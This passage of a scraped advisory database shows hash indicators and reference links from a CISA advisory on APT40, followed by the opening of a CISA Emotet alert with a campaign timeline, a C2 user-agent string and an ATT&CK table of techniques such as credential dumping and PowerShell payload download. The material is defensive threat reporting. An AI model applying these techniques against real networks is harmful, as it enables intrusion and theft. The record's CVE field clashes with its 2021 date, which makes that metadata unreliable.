n9e592d0918c029aa49635f03947026e8\n\n9f847b3618b31ef05aebd81332067bd8\n\n9fdd77dc358843af3d7b3f796580c29d\n\na025881cd4ae65fab39081f897dc04fd\n\na0e3561633bdf674b294094ffa06a362\n\na13715be3d6cbd92ed830a654d086305\n\na2256f050d865c4335161f823b681c24\n\na26e600652c33dd054731b4693bf5b01\n\na2c66a75211e05b20b86dd90ba534792\n\na2cb95be941b94f5488eab6c2eec7805\n\na320510258668504ed0140e7b58ee31e\n\na34db95c0fcb78d9c5452f81254224eb\n\na3c0151e0b6289376f383630a8014722\n\na42a91354d605165d2c1283b6b330539\n\na4711b8414445d211826b4da3f39de0a\n\na4a70ce528f64521c3cd98dce841f6f3\n\na5ac89845910862cfef708b20acd0e44\n\na67fcb5dcfc9e3cfbfd7890e65d4f808\n\na68bf5fce22e7f1d6f999b7a580ae477\n\na6b9bbb87eb08168fc92271f69fa5825\n\na6cab9f2e928d71ed8ecf2c28f03a9a2\n\na7e4f42ad70ddd380281985302573491\n\na83b1aed22de71baee82e426842eeb48\n\na91dca76278cf4f4155eb1b0fc427727\n\na96dca187c3c001cad13440c3f7e77e8\n\naa73e7056443f1dd02480a22b48bdd46\n\naaafb1eeee552b0b676a5c6297cfc426\n\nab662cee6419327de86897029a619aeb\n\nab8f72562d02156273618d1f3746855c\n\nabdb86d8b58b7394be841e0a4da9bec7\n\nace585625de8b3942cc3974cf476f8de\n\nbeea0da01409b73be94b8a3ef01c4503\n\nbefc121916f9df7363fead1c8554df9a\n\nbf250a8c0c9a820cd1a21e3425acfe37\n\nbfb0dcd9ef6ac6e016a8a5314d4ef637\n\nbff56d7e963ea28176b0bcb60033635d\n\nc05e5bc5adb803b8a53cff7f95621c73\n\nc0ad63a680fbdc75d54b270cbedb4739\n\nc0d9f3a67a8df0ed737ceb9e15bacc47\n\nc112456341a1c5519e7039ce0ba960fa\n\nc161f10fccecec67c589cdd24a05f880\n\nc183e7319f07ccc591954068e15095db\n\nc2e023b46024873573db658d7977e216\n\nc380675a29f47dba0b1401c7f8e149dc\n\nc3996bf709cad38d58907da523992e3b\n\nc583ae5235ddea207ac11fff4af82d9b\n\nc71f125fb385fed2561f3870b4593f18\n\nc75a2b191da91114ceea80638bc54030\n\nc78ee46ffbe5dd76d84fb6a74bf21474\n\nc79b27fe1440b11a99a5611c9d6c6a78\n\nc808d2ed8bb6b2e3c06c907a01b73d06\n\nc8930a4fd33dcf18923d5cf0835272bd\n\nc8940976a63366f39cfcdc099701093b\n\nc89e8f0bc93d472a4f863a5fa7037286\n\nc8a850a027fa4a3cdae7f87cc1c71ba0\n\ncab21cb7ba1c45a926b96a38b0bdaaef\n\ncbe63b9c0c9ac6e8c0f5b357df737c5e\n\ncbfc1587f89f15a62f049e9e16cccf68\n\ncd049c2b76c73510ae70610fd1042267\n\ncd058dd28822c72360bc9950a6c56c45\n\ncd427b4afea8032c77e907917608148a\n\ncd81267e9c82d24a9f40739fa6bf1772\n\ncdc22f7913eb93d77d629e59ac2dc46a\n\ncdc585a1fd677da07163875cd0807402\n\ne0b7e6c17339945bba43b8992a143485\n\ne119a70f50132ae3afba3995fdf1aca6\n\ne1512a0bf924c5a2b258ec24e593645a\n\ne195d22652b01a98259818cfbab98d33\n\ne1ab3358b5356adefaffbc15bc43a3f9\n\ne1b840bbf5b54aeb19e6396cab8f4c6a\n\ne26a29c0fc11cfb92936ab3374730b79\n\ne284c25c50ba59d07a4fa947dc1a914a\n\ne3867f6e964a29134c9ea2b63713f786\n\ne3eb703ef415659f711b6bc5604e131e\n\ne498718fd286aca7bb78858f4636f2db\n\ne4d2c63a73a0f1c6b5e60bde81ac0289\n\ne5478fb5e8d56334d19d43cae7f9224a\n\ne5f7efcee5b15cf95a070a5cd05dbda9\n\ne6348ee5beb9c581eeeaf4e076c5d631\n\ne637f47c4f17c01a68539fcfcc4bc44f\n\ne63fbc864b7911be296c8ee0798f6527\n\ne68f9b39caf116fb108ccb5c9c4ce709\n\ne6a757114c0940b6d63c6a5925ade27f\n\ne6adc73df12092012f8cd246ba619f90\n\ne8881037f684190d5f6cc26aab93d40f\n\ne890fa6fd8a98fec7812d60f65bf1762\n\ne8bc927ee0ae288609e1c37665a3314e\n\ne8e73156316df88dee28214fb203658b\n\ne957c36c9d69d6a8256b6ddf7f806f56\n\ne9ce9b35e2386bf442e22a49243a647e\n\neadcae9ecba1097571c8d08e9b1c1a9c\n\neb06648b43d34f20fc1c40e509521e99\n\neb5e5db77540516e6400a7912ad0ef0d\n\neb5e999753f5ea094d59bdae0c66901c\n\neb5ee94048730b321e35394a0fb10a5d\n\neb64867dc48f757f0afe05dbf605b72d\n\neb88f415336f0dccedfc93405330c561\n\nfae03ff044d6bb488e1a6f1c6428c510\n\nfc2142bd72bd520338f776146903be67\n\nfc9b8262905a80cc5381d520813d556d\n\nfccd3de1df131f9d74949d69426c24af\n\nfcd912fd7ed80e2cdf905873c6ced4ad\n\nff804e266a83974775814870cc49b66b\n\n| \n\n11166f8319c08c70fc886433a7dac92d\n\n1223302912ec70c7c8350268a13ad226\n\n139e071dd83304cdcfd5280022a0f958\n\n13c93dc9186258d6c335b16dc7bb3c8c\n\n14e2b0e47887c3bfbddb3b66012cb6e8\n\n15437cfedfc067370915864feec47678\n\n15e1816280d6c2932ff082329d0b1c76\n\n166694d13ac463ea1c2bed64fbbb7207\n\n16a344cd612cca4f0944ba688609e3ac\n\n16c0011ea01c4690d5e76d7b10917537\n\n1734a2b176a12eba8b74b8ca00ef1074\n\n18144e860d353600bbd2e917aed21fde\n\n1815c3a7a4a6d95f9298abb5855a3701\n\n181a5b55b7987b62b5236965f473ba3b\n\n18c26c5800e9e2482f1507c96804023e\n\n1932ce50b7b6c88014cf082228486e5c\n\n1af78c50aca90ee3d6c3497848ac5705\n\n1b44fb4aaff71b1f96cd049a9461eaf5\n\n1bb8f32e6e0e089d6a9c10737cf19683\n\n1c35a87f61953baace605fff1a2d0921\n\n1c945a6b0deccc6cd2f63c31f255d0ec\n\n1cb216777039fe6a8464fc6a214c3c86\n\n1d3a10846819a07eef66deefcc33459a\n\n1dd6c80b4ea5d83aff4480dcbbef520c\n\n1e91f0f52994617651e9b4a449af551a\n\n1eb568559e335b3ed78588e5d99f9058\n\n1ef9c42efe6e9a08b7ebb16913fa0228\n\n1f2befede815fcf65c463bf875fcf497\n\n1f9bdc0435ff0914605f01db8ca77a65\n\n1ffd883095ff3279b31650ca3a50ad3c\n\n34521c0f78d92a9d95e4f3ff15b516db\n\n34681367cbcc3933f0f4b36481bde44e\n\n34aa195c604d0725d7dd2aa4cc4efe28\n\n354b95e858bcaced369ecbfdec327e2b\n\n35f456afbe67951b3312f3b35d84ff0a\n\n3647d11c155d414239943c8c23f6e8ec\n\n37578c69c515f1d0d49769930fba25ce\n\n375cbb0a88111d786c33510bff258a21\n\n37b9b4ed979bd2cf818e2783499bfb5e\n\n3810a18650dbacecd10d257312e92f61\n\n3975740f65c2fa392247c60df70b1d6d\n\n3a4ec0d0843769a937b5dadbe8ea56b1\n\n3ab6bf23d5d244bc6d32d2626bd11c08\n\n3bf8bb90d71d21233a80b0ec96321e90\n\n3c2fe2dbdf09cfa869344fdb53307cb2\n\n3c3d453ecf8cc7858795caece63e7299\n\n3cbb46065f3e1dccbd707c340f38ce6b\n\n3cf9dc0fdc2a6ab9b6f6265dc66b0157\n\n3e89c56056e5525bf4d9e52b28fbbca7\n\n3eb6f85ac046a96204096ab65bbd3e7e\n\n3f50eedf4755b52aa7a7b740bd21daa6\n\n3fefa55daeb167931975c22df3eca20a\n\n4012acd80613aaa693a5d6cd4e7239ba\n\n40528e368d323db0ac5c3f5e1efe4889\n\n407c1ea99677615b80b2ffa2ed81d513\n\n417949c717f78dc9e55ca81a5f7ade3e\n\n4260e71d89f622c6a3359c5556b3aad7\n\n429c10429a2ebb5f161e04159a59cf5b\n\n4315975499cdc50098dbdb5b8aa4a199\n\n44fa9c5df4ae20c50313aae02ba8fb95\n\n4519b5d443a048a8599144900c4e1f28\n\n45eb058edde4e5755a5ea1aff3ce3db7\n\n460dc00ce690efacb5db8273c80e2b23\n\n5b3050df93629f2f6cb3801ed19963c5\n\n5b37ac4d642b96c4bf185c9584c0257a\n\n5b3e945cd32a380f09ea98746f570758\n\n5b72df8f6c110ae1d603354fcd8fe104\n\n5c6f5cd81b099014718056e86b510fa2\n\n5d63a3a02df2beda9d81f53abbd8264a\n\n5d9c3cb239fa24bed2781bcf2898f153\n\n5e353d1d17720c0f7c93f763e3565b3f\n\n5f1c7f267fbe12210d3c80944f840332\n\n5f393838220a6bf0cd9fd59c7cf97f5b\n\n5f771966ef530ee0c2b42ef5cc46ad3a\n\n6034ff91b376d653dc30f79664915b4e\n\n603935efa89d93ea39b4b4d4a52ec529\n\n607ea06890a6eedd723f629133576f20\n\n60b2ce5ef4a076d1fa8675b584c27987\n\n60cff7381b8fb64602816f9e5858930b\n\n614909c72fa811ae41ea3d9b70122cee\n\n6372d578e881abf76a4ec61e7a28da7d\n\n63bf28f5dc6925a94c8b4e033a95be10\n\n646cbeb4233948560ac50de555ea85ca\n\n64db8e54d9a2daaa6d9cf156a8b73c18\n\n675fe822243dfd1c3ace2a071d0aa6dd\n\n67dbecfb5e0f2f729e57d0f1eda82c67\n\n685cbba8cf2584a3378d82dec65aa0bb\n\n693a4c2fcaa67fb87e62f150fb65e00e\n\n6ad33ab8b9ff3f02964a8aab2a40ebb5\n\n6b540be7ac7159104b0ffa536747f1bf\n\n6b7276e4aa7a1e50735d2f6923b40de4\n\n6b930be55ed4bf8e16b30eadc3873dfd\n\n6c67f275d50f6bfee4848de6d4911931\n\n6c9cfada134ede220b75087c7698ebf2\n\n6e843ef4856336fe3ef4ed27a4c792b1\n\n6e97bf1b7c44edc66622b43e81105779\n\n86e50d6dc28283dbd295079252787577\n\n870fbad5b9a54cb6720c122d1fa321ec\n\n88b3b94574ba1eeb711a66eb04021eed\n\n8956a045306b672d3cc852419a72c4b0\n\n8a9ac1b3ef2bf63c2ddfadbbbfd456b5\n\n8b3b96327fbddebefe727ac2edad5714\n\n8baa499b3e2f081ff47f8cf06a5e7809\n\n8bc20fcd09adb7ea86dda2c57477633b\n\n8be0c21b6ee56d0f68e0d90f7d0a26d7\n\n8c80dd97c37525927c1e549cb59bcbf3\n\n8d2416d9f6926fb0dc12ab5dafef691d\n\n8d74922b2b31354ce588cefac71d9a9b\n\n8e8fb7632c3a7e96cf0ea5299d564018\n\n8ee6c9e1adb71b2623d5e7aa45df5f4d\n\n8efaa987959ef95179a0f5be05c10faf\n\n8fbf53f77c98daba277dae7661b86f02\n\n8fc825df73977eeffaaa1587565f7505\n\n90a3e3a2049c6eb9e39d113d9451a83f\n\n932d355d9f2df2e8d8449d85454fc983\n\n9450980a4413dfdbc60a62b257a7b019\n\n947892152b8419a2dfe498be5063c1da\n\n94d42ff06a588587131c2cd8a9b2fe96\n\n95c15b7961e2d6fad96defa7ff2c6272\n\n96ba4bf00d8b4acee9f550286610dcc7\n\n97004f1962e2aed917dc2be5c908278f\n\n972077c1bb73ca78b7cad4ac6d56c669\n\n991ebcd03ace627093acc860fae739b5\n\n99949240bc4eae33cac4bbb93b72349d\n\n9a0a8048d53dedc763992fff32584741\n\n9a0e3e80cd7c21812de81224f646715e\n\n9a61ed5721cf4586abd1d49e0da55350\n\n9b26999182ea0c2b2cac91919697289e\n\n9c656ce22c93ca31c81ff8378a0a91ee\n\nace620a0cc2684347e372f7e40e245d5\n\nad3b9e45192ec7c8085c3588cacb9c58\n\nadb4f6ecb67732b7567486f0cee6e525\n\nafa03ddb9fc64a795aadb6516c3bc268\n\nb0269263ce024fc9de19f8f30bd51188\n\nb04e895827c24070eb7082611ab79676\n\nb059c9946ff67c62c074d6d15f356f6e\n\nb07299a907a4732d14da32b417c08af3\n\nb1dadfcf459f8447b9ec44d8767da36d\n\nb2f1d2fefe9287f3261223b4b8219d03\n\nb36f3e12cb88499f8795b8740ae67057\n\nb4204f08c1a29fd4434e28b6219bfbc6\n\nb4878c233d7f776a407f55a27b5effbc\n\nb6c12d88eeb910784d75a5e4df954001\n\nb7ab5c6926f738dbe8d3a05cb4a1b4f5\n\nb80dcd50e27b85d9a44fc4f55ff0a728\n\nb8a61b1fda80f95a7dcdb0137bc89f67\n\nb9642c1b3dbcccc9d84371b3163d43e0\n\nb9647f389978f588d977ef6ef863938f\n\nb977bed98ae869a9bb9bf725215ef8e5\n\nb9b627c470de997c01fdef4511029219\n\nba629216db6cf7c0c720054b0c9a13f3\n\nbadf0957c668d9f186fb218485d0d0f6\n\nbb165b815e09fe95fa9282bce850528d\n\nbbfb478770a911cf055b8dfd8dcb36e4\n\nbc4c189e590053d2cf97569c495c9610\n\nbc9089c39bcdb1c3ef2e5bd25c77ed68\n\nbd42303e7c38486df2899b0ccf3ce8f7\n\nbd452dc2f9490a44bcff8478d875af4b\n\nbd6031dd85a578edf0bf1560caf36e02\n\nbd63832e090819ea531d1a030fb04e9b\n\nbe39ff1ec88a1429939c411113b26c02\n\nbe88741844bf7c47f81271270abe82dc\n\nce26e91fc13ccb1be4b6bf6f55165410\n\nce449d7cb0a11b53b0513dde3bd57b1c\n\nceba742bccb23304cf05d6c565dc53f8\n\ncebe44b8a9a2d6e15a03d40d9e98e0ed\n\ncf946bc0faecb2dc8e8edc9e6ce2858f\n\nd09fcd9fa9ed43c9f28bcd4bd4487d22\n\nd0b5c11ee5df0d78bdde3fdc45eaf21d\n\nd0d8243943053256bc1196e45fbf92d2\n\nd0efc042ba4a6b207cf8f5b6760799d8\n\nd20d01038e6ea10a9dcc72a88db5e048\n\nd31596fe58ca278be1bb46e2a0203b34\n\nd3df8c426572a85f3afa46e4cd2b66cd\n\nd59a77a8da7bec1f4bad7054a41b3232\n\nd76b1c624e9227131a2791957955dddc\n\nd79477c9c688a8623930f4235c7228f6\n\nd8a483d21504e73f0ba4b30bc01125d3\n\nda46994fee26782605842005aabcd2fe\n\ndaa232882b74d60443dfec8742401808\n\ndab45ac39e34cfee60dcb005c3d5a668\n\ndbc583d6d5ec8f7f0c702b209af975e2\n\ndbe92b105f474efc4a0540673da0eb9c\n\ndbee8be5265a9879b61853cd9c0e4759\n\ndc15ca49b39d1d17b22ec7580d32d905\n\ndc386102060f7df285e9498f320f10e0\n\ndd43cd0eddbb6f7cb69b1f469c37ec35\n\ndd4e0f997e0b2cc9df28dca63ded6816\n\nddbdc6a3801906de598531b5b2dac02a\n\ndde4ff4e41f86426051f15da48667f5f\n\nddecce92a712327c4068fabf0e1a7ff1\n\nde608439f2bcc097b001d352b427bb68\n\ndeeb9b4789ac002aa8b834da76e70d74\n\ndf6475642f1fe122df3d7292217f1cff\n\ne011784958e7a00ec99b8f2320e92bf4\n\nec4cdc752c2ecd0d9f97491cc646a269\n\nedb648f6c3c2431b5b6788037c1cd8ef\n\nee3e297abd0a5b943dce46f33f3d56fb\n\nee4862bc4916fc22f219e1120bea734a\n\nef14448bf97f49a2322d4c79e64bb60b\n\nef2738889e9d041826d5c938a256bc45\n\nef6fcdd1b55adf8ad6bcdf3d93fd109e\n\nefb5499492f08c1f10fecdeb703514d5\n\nf0098aab593b65d980061a2df3a35c21\n\nf073de9c169c8fcb2de5b811bff51cee\n\nf0881d5a7f75389deba3eff3f4df09ac\n\nf172ad4e906d97ed8f071896fc6789dc\n\nf2b6bffa2c22420c0b1c848b673055ed\n\nf446d8808a14649bddcc412f9e754890\n\nf4dbe32f3505bc17364e2b125f8dd6df\n\nf4dd628f6c0bc2472d29c796ee38bf46\n\nf4e67343e13c37449ada7335b9c53dd1\n\nf53e332b0a6dbe8d8d3177e93b70cb1e\n\nf5ae03de0ad60f5b17b82f2cd68402fe\n\nf5ce889a1fa751b8fd726994cdb8f97e\n\nf5fdbfce1a5d2c000c266f4cd180a78d\n\nf7202dea71cc638e0c2dbeb92c2ce279\n\nf7cef381c4ee3704fc8216f00f87552a\n\nf7ffbbbc68aadcbfbace55c58b6da0a7\n\nf8b91554d221fe8ef4a4040e9516f919\n\nf906571d719828f0f4b6212fc2aa7705\n\nf9155052a43832061357c23de873ff9f\n\nf9abacc459e5d50d8582e8c660752c4e\n\nf9f608407d551f49d632bd6bd5bd7a56\n\nf9fc9359dc5d1d0ac754b12efb795f79\n\nfa27742b87747e64c8cb0d54aa70ef98\n\nfa3c8d91ef4a8b245033ddb9aa3054a2\n\nfad93907d5587eb9e0d8ebc78a5e19c2 \n \n \n---|--- \n \n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> \"Email CISA Central\" ).\n\n### References\n\n[DOJ Press Release](<https://www.justice.gov/opa/pr/four-chinese-nationals-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[Talos Intelligence: China Chopper Still Active 9 Years Later](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html?m=1>)\n\n[CISA China Cyber Threat Overview webpage ](<https://us-cert.cisa.gov/china>)\n\n[CISA Alert TA15-314A: Compromised Web Servers and Web Shells - Threat Awareness and Guidance ](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>)\n\n[CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/AA20-133a>)\n\n[CISA Alert AA20-275A: Potential for China Cyber Response to Heightened U.S.-China Tensions ](<https://us-cert.cisa.gov/ncas/alerts/AA20-275A>)\n\n[NSA Cybersecurity Advisory U/OO/179811-20: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities ](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nJuly 19, 2021: Initial version|Updated July 19, 2021: Added note and STIX file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-07-20T12:00:00", "type": "ics", "title": "Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China\u2019s MSS Hainan State Security Department", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-07-20T12:00:00", "id": "AA21-200A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:04:38", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing &amp; Analysis Center (MS-ISAC).\n\nEmotet\u2014a sophisticated Trojan commonly functioning as a downloader or dropper of other malware\u2014resurged in July 2020, after a dormant period that began in February. Since August, CISA and MS-ISAC have seen a significant increase in malicious cyber actors targeting state and local governments with Emotet phishing emails. This increase has rendered Emotet one of the most prevalent ongoing threats.\n\nTo secure against Emotet, CISA and MS-ISAC recommend implementing the mitigation measures described in this Alert, which include applying protocols that block suspicious attachments, using antivirus software, and blocking suspicious IPs.\n\n### Technical Details\n\nEmotet is an advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch the payload (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v7/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002/>)]).The malware then attempts to proliferate within a network by brute forcing user credentials and writing to shared drives (_Brute Force: Password Guessing_ [[T1110.001](<https://attack.mitre.org/versions/v7/techniques/T1110/001/>)], _Valid Accounts: Local Accounts_ [[T1078.003](<https://attack.mitre.org/versions/v7/techniques/T1078/003/>)], _Remote Services: SMB/Windows Admin Shares_ [[T1021.002](<https://attack.mitre.org/versions/v7/techniques/T1021/002/>)]).\n\nEmotet is difficult to combat because of its \u201cworm-like\u201d features that enable network-wide infections. Additionally, Emotet uses modular Dynamic Link Libraries to continuously evolve and update its capabilities.\n\nSince July 2020, CISA has seen increased activity involving Emotet-associated indicators. During that time, CISA\u2019s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected roughly 16,000 alerts related to Emotet activity. CISA observed Emotet being executed in phases during possible targeted campaigns. Emotet used compromised Word documents (.doc) attached to phishing emails as initial insertion vectors. Possible command and control network traffic involved `HTTP POST` requests to Uniform Resource Identifiers consisting of nonsensical random length alphabetical directories to known Emotet-related domains or IPs with the following user agent string (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v7/techniques/T1071/001/>)]).\n\n`Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR`\n\nTraffic to known Emotet-related domains or IPs occurred most commonly over ports 80, 8080, and 443. In one instance, traffic from an Emotet-related IP attempted to connect to a suspected compromised site over port 445, possibly indicating the use of Server Message Block exploitation frameworks along with Emotet (_Exploitation of Remote Services_ [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210/>)]). Figure 1 lays out Emotet\u2019s use of enterprise techniques.\n\n\u200b\n\n_Figure 1: MITRE ATT&amp;CK enterprise techniques used by Emotet_\n\n#### \n\n#### Timeline of Activity\n\nThe following timeline identifies key Emotet activity observed in 2020.\n\n * **February**: Cybercriminals targeted non-U.S. countries using COVID-19-themed phishing emails to lure victims to download Emotet.[[1](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)]\n * **July**: Researchers spotted emails with previously used Emotet URLs, particularly those used in the February campaign, targeting U.S. businesses with COVID-19-themed lures.[[2](<https://www.bleepingcomputer.com/news/security/emotet-malware-strikes-us-businesses-with-covid-19-spam/>)]\n * **August**: \n * Security researchers observed a 1,000 percent increase in downloads of the Emotet loader. Following this change, antivirus software firms adjusted their detection heuristics to compensate, leading to decreases in observed loader downloads.[[3](<https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/>)] \n * Proofpoint researchers noted mostly minimal changes in most tactics and tools previously used with Emotet. Significant changes included: \n * Emotet delivering Qbot affiliate `partner01` as the primary payload and\n * The Emotet mail sending module\u2019s ability to deliver benign and malicious attachments.[[4](<https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return>)]\n * CISA and MS-ISAC observed increased attacks in the United States, particularly cyber actors using Emotet to target state and local governments.\n * **September**: \n * Cyber agencies and researchers alerted the public of surges of Emotet, including compromises in Canada, France, Japan, New Zealand, Italy, and the Netherlands. Emotet botnets were observed dropping Trickbot to deliver ransomware payloads against some victims and Qakbot Trojans to steal banking credentials and data from other targets.[[5](<https://www.zdnet.com/article/france-japan-new-zealand-warn-of-sudden-spike-in-emotet-attacks/>)],[[6](<https://www.bleepingcomputer.com/news/security/france-warns-of-emotet-attacking-companies-administration/>)],[[7](<https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/>)],[[8](<https://www.zdnet.com/article/microsoft-italy-and-the-netherlands-warn-of-increased-emotet-activity/>)]\n * Security researchers from Microsoft identified a pivot in tactics from the Emotet campaign. The new tactics include attaching password-protected archive files (e.g., Zip files) to emails to bypass email security gateways. These email messages purport to deliver documents created on mobile devices to lure targeted users into enabling macros to \u201cview\u201d the documents\u2014an action which actually enables the delivery of malware.[[9](<https://www.bleepingcomputer.com/news/security/emotet-double-blunder-fake-windows-10-mobile-and-outdated-messages/>)]\n * Palo Alto Networks reported cyber actors using thread hijacking to spread Emotet. This attack technique involves stealing an existing email chain from an infected host to reply to the chain\u2014using a spoofed identity\u2014and attaching a malicious document to trick recipients into opening the file.[[10](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>)]\n\n### MITRE ATT&amp;CK Techniques\n\nAccording to MITRE, [Emotet](<https://attack.mitre.org/versions/v7/software/S0367/>) uses the ATT&amp;CK techniques listed in table 1.\n\n_Table 1: Common exploit tools_\n\nTechnique\n\n| Use \n---|--- \n \n_OS Credential Dumping: LSASS Memory_ [[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)]\n\n| \n\nEmotet has been observed dropping password grabber modules including Mimikatz. \n \n_Remote Services: SMB/Windows Admin Shares_ [[T1021.002](<https://attack.mitre.org/versions/v7/techniques/T1021/002/>)]\n\n| \n\nEmotet leverages the Admin$ share for lateral movement once the local admin password has been brute forced. \n \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/versions/v7/techniques/T1027/>)]\n\n| \n\nEmotet has obfuscated macros within malicious documents to hide the URLs hosting the malware, `cmd.exe` arguments, and PowerShell scripts. \n \n_Obfuscated Files or Information: Software Packing _[[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002/>)]\n\n| \n\nEmotet has used custom packers to protect its payloads. \n \n_Network Sniffing_ [[T1040](<https://attack.mitre.org/versions/v7/techniques/T1040/>)]\n\n| \n\nEmotet has been observed to hook network APIs to monitor network traffic. \n \n_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041/>)]\n\n| \n\nEmotet has been seen exfiltrating system information stored within cookies sent within a `HTTP GET` request back to its command and control (C2) servers. \n \n_Windows Management Instrumentation_ [[T1047](<https://attack.mitre.org/versions/v7/techniques/T1047/>)]\n\n| \n\nEmotet has used WMI to execute `powershell.exe`. \n \n_Process Injection: Dynamic-link Library Injection_ [[T1055.001](<https://attack.mitre.org/versions/v7/techniques/T1055/001/>)]\n\n| \n\nEmotet has been observed injecting in to `Explorer.exe` and other processes. \n \n_Process Discovery_ [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)]\n\n| \n\nEmotet has been observed enumerating local processes. \n \n_Command and Scripting Interpreter: PowerShell_ [[T1059.001](<https://attack.mitre.org/versions/v7/techniques/T1059/001/>)]\n\n| \n\nEmotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz. \n \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)]\n\n| \n\nEmotet has used `cmd.exe` to run a PowerShell script. \n \n_Command and Scripting Interpreter: Visual Basic_ [[T1059.005](<https://attack.mitre.org/versions/v7/techniques/T1059/005/>)]\n\n| \n\nEmotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. \n \n_Valid Accounts: Local Accounts _[[T1078.003](<https://attack.mitre.org/versions/v7/techniques/T1078/003/>)]\n\n| \n\nEmotet can brute force a local admin password, then use it to facilitate lateral movement. \n \n_Account Discovery: Email Account _[[T1087.003](<https://attack.mitre.org/versions/v7/techniques/T1087/003/>)]\n\n| \n\nEmotet has been observed leveraging a module that can scrape email addresses from Outlook. \n \n_Brute Force: Password Guessing _[[T1110.001](<https://attack.mitre.org/versions/v7/techniques/T1110/001/>)]\n\n| \n\nEmotet has been observed using a hard-coded list of passwords to brute force user accounts. \n \n_Email Collection: Local Email Collection_ [[T1114.001](<https://attack.mitre.org/versions/v7/techniques/T1114/001/>)]\n\n| \n\nEmotet has been observed leveraging a module that scrapes email data from Outlook. \n \n_User Execution: Malicious Link _[[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)]\n\n| \n\nEmotet has relied upon users clicking on a malicious link delivered through spearphishing. \n \n_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)]\n\n| \n\nEmotet has relied upon users clicking on a malicious attachment delivered through spearphishing. \n \n_Exploitation of Remote Services_ [[T1210](<https://attack.mitre.org/versions/v7/techniques/T1210/>)]\n\n| \n\nEmotet has been seen exploiting SMB via a vulnerability exploit like ETERNALBLUE ([MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>)) to achieve lateral movement and propagation. \n \n_Create or Modify System Process: Windows Service _[[T1543.003](<https://attack.mitre.org/versions/v7/techniques/T1543/003/>)]\n\n| \n\nEmotet has been observed creating new services to maintain persistence. \n \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)]\n\n| \n\nEmotet has been observed adding the downloaded payload to the 